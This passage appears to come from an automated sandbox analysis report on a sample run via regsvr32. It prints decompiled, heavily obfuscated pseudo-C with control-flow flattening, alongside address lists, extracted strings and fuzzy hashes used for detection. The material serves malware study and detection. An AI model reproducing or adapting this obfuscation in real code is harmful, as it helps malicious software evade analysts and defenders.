				_v40 = _v40 << 0x10;
				_v40 = _v40 ^ 0x8e1c4dbd;
				_v32 = 0xa8fcf7;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 / _t530;
				_t531 = 0x59;
				_v32 = _v32 * 0x62;
				_v32 = _v32 ^ 0x9808cd5a;
				_v56 = 0xfa54e1;
				_v56 = _v56 + 0xffff7ead;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t531;
				_v56 = _v56 ^ 0x00b2c623;
				_v132 = 0x7ed953;
				_v132 = _v132 ^ 0x188046ff;
				_v132 = _v132 ^ 0x18f64c45;
				_v124 = 0x5f3094;
				_v124 = _v124 ^ 0xdd2f4899;
				_v124 = _v124 ^ 0xdd733dae;
				_v48 = 0x3fdd04;
				_v48 = _v48 + 0xdca9;
				_v48 = _v48 ^ 0x51a2bdec;
				_v48 = _v48 + 0xffffe9fd;
				_v48 = _v48 ^ 0x51eeddfc;
				_v116 = 0x86a662;
				_t532 = 0x3e;
				_t533 = _v156;
				_v116 = _v116 / _t532;
				_v116 = _v116 * 0x73;
				_v116 = _v116 ^ 0x00fd398d;
				_v64 = 0x72f53e;
				_v64 = _v64 + 0x31db;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0xffff6dcd;
				_v64 = _v64 ^ 0x0003149a;
				while(1) {
					_t508 = 0x2e;
					L2:
					while(_t460 != 0x9b6cb5) {
						if(_t460 == 0x44804ea) {
							__eflags = _v820 & _v152;
							if(__eflags == 0) {
								_t445 =  *_t534( &_v820,  &_v228);
								asm("sbb ecx, ecx");
								_t460 = ( ~_t445 & 0xfb5d1634) + 0x53e5681;
								while(1) {
									_t508 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v776 - _t508;
							if(_v776 != _t508) {
								L18:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v28);
									_push(_v68);
									_push(_v72);
									E04BA2D0A(_v84, __eflags,  &_v776, _v76, _v36, _v60, E04B816DC,  &_v1860, _t458, E04B9E1F8(E04B816DC, _v148, __eflags));
									E04B9437A(_v156, _v24, _v16, _v100, _v92, _a16, _a20,  &_v1860);
									_t447 = E04B9FECB(_t452, _v140, _v108, _v40, _v32);
									_t534 = _v156;
									_t538 = _t538 + 0x50;
									_t508 = 0x2e;
								}
								L17:
								_t460 = 0x9b6cb5;
								continue;
							}
							__eflags = _v774;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v774 - _t508;
							if(_v774 != _t508) {
								goto L18;
							}
							__eflags = _v772;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t460 == 0x481089e) {
							_t447 = E04B92DA7( &_v820, _v88, _v136,  &_v1340);
							_t533 = _t447;
							__eflags = _t447 - 0xffffffff;
							if(__eflags == 0) {
								return _t447;
							}
							_t460 = 0x44804ea;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 == 0x53e5681) {
							return E04B8BEA1(_v116, _v64, _t533);
						}
						if(_t460 == 0xeb5715f) {
							_push(_v104);
							_push(_v96);
							_push(_v80);
							E04B92C9C(_v12, __eflags, E04B9E1F8(0x4b8167c, _v120, __eflags),  &_v1340, 0x4b8167c, _v112, _t458);
							_t447 = E04B9FECB(_t449, _v44, _v20, _v144, _v52);
							_t534 = _v156;
							_t538 = _t538 + 0x2c;
							_t460 = 0x481089e;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 != 0xf0aa094) {
							L24:
							__eflags = _t460 - 0x41075ad;
							if(__eflags != 0) {
								continue;
							}
							return _t447;
						}
						_v168 = _t458;
						_t460 = 0xeb5715f;
					}
					_t441 = E04BA0F1E(_v56, _v132,  &_v820, _v124, _v48, _t533);
					_t538 = _t538 + 0x10;
					__eflags = _t441;
					if(__eflags != 0) {
						_t460 = 0x44804ea;
						_t508 = 0x2e;
						goto L24;
					}
					_t460 = 0x53e5681;
				}
			}

0x04b94384
0x04b94389
0x04b9438a
0x04b9438d
0x04b9438f
0x04b94392
0x04b94398
0x04b9439b
0x04b9439e
0x04b943a1
0x04b943a2
0x04b943a3
0x04b943a8
0x04b943b2
0x04b943be
0x04b943c5
0x04b943c6
0x04b943cc
0x04b943d6
0x04b943dd
0x04b943e4
0x04b943eb
0x04b943f8
0x04b943fb
0x04b94402
0x04b94409
0x04b94414
0x04b9441e
0x04b94421
0x04b94428
0x04b94432
0x04b94437
0x04b9443c
0x04b94440
0x04b94447
0x04b94451
0x04b94456
0x04b9445b
0x04b94462
0x04b9446c
0x04b94471
0x04b94476
0x04b9447a
0x04b9447e
0x04b94485
0x04b9448c
0x04b94490
0x04b94497
0x04b9449e
0x04b944a5
0x04b944af
0x04b944b2
0x04b944b5
0x04b944b9
0x04b944c0
0x04b944ce
0x04b944d3
0x04b944d8
0x04b944dc
0x04b944e3
0x04b944ea
0x04b944fb
0x04b944fe
0x04b94504
0x04b9450e
0x04b94515
0x04b9451c
0x04b94523
0x04b94527
0x04b9452e
0x04b94535
0x04b94538
0x04b9453f
0x04b94546
0x04b94550
0x04b9455a
0x04b94564
0x04b9456e
0x04b94578
0x04b94582
0x04b94589
0x04b9458d
0x04b94594
0x04b9459b
0x04b945a9
0x04b945ac
0x04b945b0
0x04b945b7
0x04b945be
0x04b945c5
0x04b945cc
0x04b945d3
0x04b945da
0x04b945e4
0x04b945e9
0x04b945f1
0x04b945f6
0x04b945fe
0x04b94601
0x04b94604
0x04b9460b
0x04b94612
0x04b94619
0x04b9461d
0x04b94624
0x04b9462b
0x04b94633
0x04b94636
0x04b9463d
0x04b94644
0x04b9464b
0x04b9464f
0x04b94656
0x04b9465d
0x04b94664
0x04b9466d
0x04b94674
0x04b94678
0x04b9467f
0x04b94686
0x04b9468d
0x04b94691
0x04b94698
0x04b9469f
0x04b946ab
0x04b946b0
0x04b946b3
0x04b946ba
0x04b946c1
0x04b946c8
0x04b946cf
0x04b946d3
0x04b946da
0x04b946e1
0x04b946ed
0x04b946f2
0x04b946f5
0x04b946fc
0x04b94703
0x04b9470d
0x04b94714
0x04b9471e
0x04b94725
0x04b94729
0x04b9472d
0x04b94734
0x04b9473b
0x04b9473f
0x04b94746
0x04b9474a
0x04b94751
0x04b9475e
0x04b94768
0x04b9476f
0x04b94772
0x04b94775
0x04b9477c
0x04b94783
0x04b9478a
0x04b94795
0x04b94798
0x04b9479f
0x04b947a6
0x04b947ad
0x04b947b4
0x04b947bb
0x04b947c2
0x04b947c9
0x04b947d0
0x04b947d7
0x04b947de
0x04b947e5
0x04b947ec
0x04b947f6
0x04b947f9
0x04b947ff
0x04b94806
0x04b94809
0x04b94810
0x04b94817
0x04b9481e
0x04b94822
0x04b94829
0x04b94830
0x04b94832
0x00000000
0x04b94833
0x04b94845
0x04b9491b
0x04b94921
0x04b949f9
0x04b949ff
0x04b94a07
0x04b94830
0x04b94832
0x00000000
0x04b94832
0x04b94830
0x04b94927
0x04b9492e
0x04b94957
0x04b94957
0x04b9495b
0x04b9495d
0x04b94965
0x04b94968
0x04b9499b
0x04b949bf
0x04b949d5
0x04b949da
0x04b949e0
0x04b949e5
0x04b949e5
0x04b9494d
0x04b9494d
0x00000000
0x04b9494d
0x04b94930
0x04b94938
0x00000000
0x00000000
0x04b9493a
0x04b94941
0x00000000
0x00000000
0x04b94943
0x04b9494b
0x00000000
0x00000000
0x00000000
0x04b9494b
0x04b94851
0x04b948f9
0x04b948fe
0x04b94902
0x04b94905
0x04b94a65
0x04b94a65
0x04b9490b
0x04b94830
0x04b94832
0x00000000
0x04b94832
0x04b94830
0x04b9485d
0x00000000
0x04b94a5e
0x04b94869
0x04b94884
0x04b9488c
0x04b9488f
0x04b948b2
0x04b948cb
0x04b948d0
0x04b948d6
0x04b948d9
0x04b94830
0x04b94832
0x00000000
0x04b94832
0x04b94830
0x04b94871
0x04b94a44
0x04b94a44
0x04b94a4a
0x00000000
0x00000000
0x00000000
0x04b94a4a
0x04b94877
0x04b9487d
0x04b9487d
0x04b94a26
0x04b94a2b
0x04b94a2e
0x04b94a30
0x04b94a3e
0x04b94a43
0x00000000
0x04b94a43
0x04b94a32
0x04b94a32

Strings

3;+, xrefs: 04B944EA
7S, xrefs: 04B9469F
#`, xrefs: 04B9453F
#[y,, xrefs: 04B945D3

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #`$#[y,$3;+$7S
API String ID: 0-3740457175
Opcode ID: 66e6ecae6f509d42cc913ec0d017db152dd723c70e7cb271891057f0da4470ae
Instruction ID: c0081ed9856702b992b9afb688ca3c7ddd94c0cd42ee94f1bc4210edb04df24a
Opcode Fuzzy Hash: 66e6ecae6f509d42cc913ec0d017db152dd723c70e7cb271891057f0da4470ae
Instruction Fuzzy Hash: 6D124771D00218DBDF28DFA5D989ADEBBB2FF44318F2081A9D115BB260D7B05A96CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BA00EF, Relevance: 5.3, Strings: 4, Instructions: 274COMMON

Download Yara Rule

Strings

$P, xrefs: 04BA0101
XW, xrefs: 04BA0475
+XJ, xrefs: 04BA0250
_!1, xrefs: 04BA026E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: 8326e05e268edd73a36f2ce867ee778ee4dd5e76fefd495039d42d8a3ce32480
Instruction ID: 4c27bf048cdd93efb33b4c8fa74be83697507a0c7fda0d1d539d614dad1c1bf1
Opcode Fuzzy Hash: 8326e05e268edd73a36f2ce867ee778ee4dd5e76fefd495039d42d8a3ce32480
Instruction Fuzzy Hash: 3ED111715083809FD368DF25C98AA5BFBF2FBC4748F108A1DF5999A260D7B19918CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B880C0, Relevance: 5.3, Strings: 4, Instructions: 261COMMON

Download Yara Rule

Strings

K:, xrefs: 04B88134
#', xrefs: 04B88192
"M|X, xrefs: 04B8828D
{lN, xrefs: 04B88304

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: c03144a75447bbf96b731f565e1257c5db0e4af768d003b72a47266cb709e89a
Instruction ID: 5912e462f9f5b330470ba0a637844901fec6501af1890e8a47d0eae09dbc1bff
Opcode Fuzzy Hash: c03144a75447bbf96b731f565e1257c5db0e4af768d003b72a47266cb709e89a
Instruction Fuzzy Hash: F9C153725083809FC358EF2AC48A90BFBE1FBD4758F50896DF99596260D3B0E949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B84BFC, Relevance: 5.2, Strings: 4, Instructions: 245COMMON

Download Yara Rule

Strings

Rw, xrefs: 04B84C0B
~<?, xrefs: 04B84CAA
~<?, xrefs: 04B84C8E
8&, xrefs: 04B84E58

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8&$Rw$~<?$~<?
API String ID: 0-2119221410
Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction ID: 57d1a3a973ad7fda343b4d77d8008d21e1ff033d875b4fd6a1d8fccb32abc403
Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction Fuzzy Hash: 9FB11D716093419FC358DF2AC48991BFBE1FBC4758F50892DF9A996220D3B4E949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04BA2D53, Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

$P, xrefs: 04BA2DC3, 04BA30B9
+;, xrefs: 04BA2F83
sH, xrefs: 04BA2F41
zbv, xrefs: 04BA2E19

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: 9e5401cee7425ee562c1ae2bac9cd13529a385c11946804e0d34bf331ff182af
Instruction ID: 4b0d486174bbee8c535d5e68c0857aafb6378660c6b6b2934700d729b59d0c73
Opcode Fuzzy Hash: 9e5401cee7425ee562c1ae2bac9cd13529a385c11946804e0d34bf331ff182af
Instruction Fuzzy Hash: D9B10EB2508381AFD358CF65C48A41BFBE2FBC4358F509A1DF59686260E3B1D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B9E4E5, Relevance: 5.2, Strings: 4, Instructions: 220COMMON

Download Yara Rule

Strings

$P, xrefs: 04B9E623
-, xrefs: 04B9E5D4
ma+, xrefs: 04B9E57D
ap@', xrefs: 04B9E5A3

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: f1f53c54bb4673bb132bbbdb2aa96db0d4a728176b57e98e209f509569f60153
Instruction ID: 6219970347e9cda38e857528973afd7f85dc83d5cf747d6ced9d6ee060a2edc3
Opcode Fuzzy Hash: f1f53c54bb4673bb132bbbdb2aa96db0d4a728176b57e98e209f509569f60153
Instruction Fuzzy Hash: 86918C712083418FCB68DE24C49896FBBE1FBD4308F0449AEF596562A0DB74EA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B93EAA, Relevance: 5.2, Strings: 4, Instructions: 152COMMON

Download Yara Rule

Strings

n<, xrefs: 04B93F14
4r~, xrefs: 04B93FCF
p3, xrefs: 04B93F32
Zr, xrefs: 04B9412E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: cb74d42bb9db24f03d14bc1ff4f7db769d17facb0ee3e6c289e0de173c71061e
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: C561557150C3009FC758CE26C48942FBBE1FBD8758F104A6DF29AA6261D374DA4ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 04B99A01, Relevance: 5.1, Strings: 4, Instructions: 140COMMON

Download Yara Rule

Strings

l@, xrefs: 04B99A34
<f~, xrefs: 04B99AC8
}0, xrefs: 04B99A6C
<o, xrefs: 04B99A4B

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <f~$<o$l@$}0
API String ID: 0-758050912
Opcode ID: 7a5999ab49e11d16c3c47f0d4088c0266d4372916475c4949c8f004e30fe5563
Instruction ID: 56862650f30adcb6505f867f0d0a905b9edbe86d4cdda0ec1d223fde45888c50
Opcode Fuzzy Hash: 7a5999ab49e11d16c3c47f0d4088c0266d4372916475c4949c8f004e30fe5563
Instruction Fuzzy Hash: 4A5175B1508300AFDB88CF22C88942FBBE1EBC8358F54595DF59656260D3B19A488F87

Uniqueness

Uniqueness Score: -1.00%

Function 04B82194, Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

#FZ, xrefs: 04B821DF
g#, xrefs: 04B821E6
^di_, xrefs: 04B82235
y^, xrefs: 04B8225F

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: d739b5aa151a99faa5f26973b098b543bd2ac1b59c571ebeae7ca77065eafc34
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: D131E372800208FBDF05DFA5DC098DEBFB6FB89314F508159FA10A6120D3B69A60AB90

Uniqueness

Uniqueness Score: -1.00%

Function 10027704, Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10027704() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E100167D5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x1002770a
0x10027711
0x10027715
0x10027731
0x10027752
0x10027758
0x10027733
0x10027733
0x10027738
0x1002773b
0x00000000
0x1002773d
0x1002773d
0x10027743
0x10027744
0x10027748
0x1002774a
0x10027750
0x00000000
0x00000000
0x10027750
0x1002773b
0x10027768

APIs

GetThreadLocale.KERNEL32 ref: 10027717
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10027729
GetACP.KERNEL32 ref: 10027752

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction ID: 66289914fabe9bf2d1b1abcf1e27b8b8f35a8bed3fb6bd80cc0c1702fed1c004
Opcode Fuzzy Hash: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction Fuzzy Hash: DCF0C231E042785BE701DB7598556EF77E4FF04B90B9101ADEC86E7280D720AE0987C4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D804, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000D804(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000D6C3() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000D7B8( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1005a754(_a4, _a8);
			}

0x1000d811
0x1000d825
0x1000d839
0x1000d851
0x1000d83b
0x1000d842
0x1000d842
0x1000d859
0x00000000
0x1000d85b
0x00000000
0x1000d862
0x1000d859
0x00000000
0x1000d827
0x00000000

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction ID: 387a2a710324106c5c2e9ba8f0dac284bfb83953cc403e56f04fca2c0ded1ab9
Opcode Fuzzy Hash: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction Fuzzy Hash: 71F0C935504209AAFF01EF61CC489AE7BA9EF043D4B10C026FC19D5068DB35DA559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B98FAE, Relevance: 4.1, Strings: 3, Instructions: 312COMMON

Download Yara Rule

Strings

<S, xrefs: 04B991CE
zPB, xrefs: 04B9926B
tU, xrefs: 04B9922D

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: 4e397ee11e9970228351c355b077a73c62773fc6fe17a585051a1c03511671fb
Instruction ID: a490a41e2ac9df2799a60430dafc9916f8cff24108f73feb9b13bfe7af04b8de
Opcode Fuzzy Hash: 4e397ee11e9970228351c355b077a73c62773fc6fe17a585051a1c03511671fb
Instruction Fuzzy Hash: CFF10F715083809FE7A8CF25C58AA4BBBF2FBC5748F10891DE59A96260D7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B99DF5, Relevance: 4.0, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

K3, xrefs: 04B99E4A
", xrefs: 04B99FAE
%;, xrefs: 04B99F0A

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: a43d34c56156b02dd4d25d8ff3d614da52ad30768692dc248d9bb408ee8814bc
Instruction ID: 8cfe5daf8c49cbabb00aab50d7e08d4474bedc0ae0b8f046b3076fefe7f92446
Opcode Fuzzy Hash: a43d34c56156b02dd4d25d8ff3d614da52ad30768692dc248d9bb408ee8814bc
Instruction Fuzzy Hash: C2A18472108380AFD758DF66C58995FBBE2FBC9758F00896DF0859A220D3B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B8A445, Relevance: 4.0, Strings: 3, Instructions: 213COMMON

Download Yara Rule

Strings

), xrefs: 04B8A51E
kb, xrefs: 04B8A5BE
B:o, xrefs: 04B8A602

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: 8a011fce29d124adb992e5313d1f7751828c78c93d1cfa1e95745084b1156759
Instruction ID: 468eb42a581d2389fecff84e337fd2f50c33197937169913cb824822b7d11ff5
Opcode Fuzzy Hash: 8a011fce29d124adb992e5313d1f7751828c78c93d1cfa1e95745084b1156759
Instruction Fuzzy Hash: 5BA130B15083419FC398CF65C88981BBBF1FBC8748F009A2EF59A96260D3B19909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B9BEFD, Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

', xrefs: 04B9C145
$w%, xrefs: 04B9C027
8~", xrefs: 04B9BF5F

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: ee90fa9c1a4505f8c39f817c9df96144749e08d96f08134f6281d6cd25975dd7
Instruction ID: d0ddbd22acec947642a39f46be2e122758922b53cd7114285887bada3069967a
Opcode Fuzzy Hash: ee90fa9c1a4505f8c39f817c9df96144749e08d96f08134f6281d6cd25975dd7
Instruction Fuzzy Hash: 95A12171D00209EBDF18DFE5D98A9DEBBB2FB44318F208059E511BA264D7B41A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04B9D8DB, Relevance: 3.9, Strings: 3, Instructions: 157COMMON

Download Yara Rule

Strings

m~`, xrefs: 04B9D991
)-, xrefs: 04B9DA04
(2, xrefs: 04B9DA8A

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: 3440967ed47aa99223825fbcea371c2cb58e1cee5ec1b7034b49c18d213b689c
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: F27155B29083029FC794DF25D58545BBBF4FBC8358F004A6DF59A96220E3B5DA198F83

Uniqueness

Uniqueness Score: -1.00%

Function 04B99774, Relevance: 3.9, Strings: 3, Instructions: 149COMMON

Download Yara Rule

Strings

E, xrefs: 04B997FD
1C4, xrefs: 04B998EC
F7, xrefs: 04B997C3

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

